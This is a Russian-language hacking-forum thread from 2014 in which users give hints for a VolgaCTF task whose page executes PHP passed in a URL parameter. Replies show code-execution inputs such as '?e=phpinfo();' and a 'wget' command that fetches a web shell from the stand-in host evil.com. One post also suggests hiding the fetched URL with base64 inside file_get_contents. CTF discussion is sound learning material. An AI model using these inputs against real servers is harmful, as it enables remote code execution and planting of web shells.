ANTICHAT - Помогите с поиском флага

ANTICHAT (https://forum.antichat.xyz/index.php)

- Задания/Квесты/CTF/Конкурсы (https://forum.antichat.xyz/forumdisplay.php?f=112)

- - Помогите с поиском флага (https://forum.antichat.xyz/showthread.php?t=409605)

markelpkr

30.03.2014 12:35

Добрый день античатовцы, помогите пожалуйста найти флаг)

http://tasks.2014.volgactf.ru:28103/

fl00der

30.03.2014 12:38

Какая-то ссылка подозрительная. Не пойду.

Toxa33rus

30.03.2014 13:59

Цитата:

Сообщение от fl00der

Какая-то ссылка подозрительная. Не пойду.

Там открывается вот это:

Notice: Undefined index: e in /var/www/index.php on line 3

Куда е дели? Третья строка негодует)

markelpkr

30.03.2014 14:13

есть подсказка /?e=echo pi

Fepsis

30.03.2014 15:46

Цитата:

Сообщение от markelpkr

есть подсказка /?e=echo pi

e=echo pi - выводит результат функции pi()

http://www.php.su/functions/?pi

соответственно e=echo functionname выведет результат functionname()

например http://tasks.2014.volgactf.ru:28103/?e=echo+phpinfo;

На этом мои знания заканчиваются, да и не честно так ))

Unknown

30.03.2014 17:14

У тебя на прямую выполняется:

_ttp://tasks.2014.volgactf.ru:28103/?e=phpinfo();

классика же:

Код:

wget -o test.php http://evil.com/sh.txt

-=Cerberus=-

02.05.2014 15:29

или этой функцией http://www.php.net/manual/ru/function.file-get-contents.php

при необходимости урл можно закодировать в базу64 и дергать в file_get_contents через base64_decode

Время: 16:37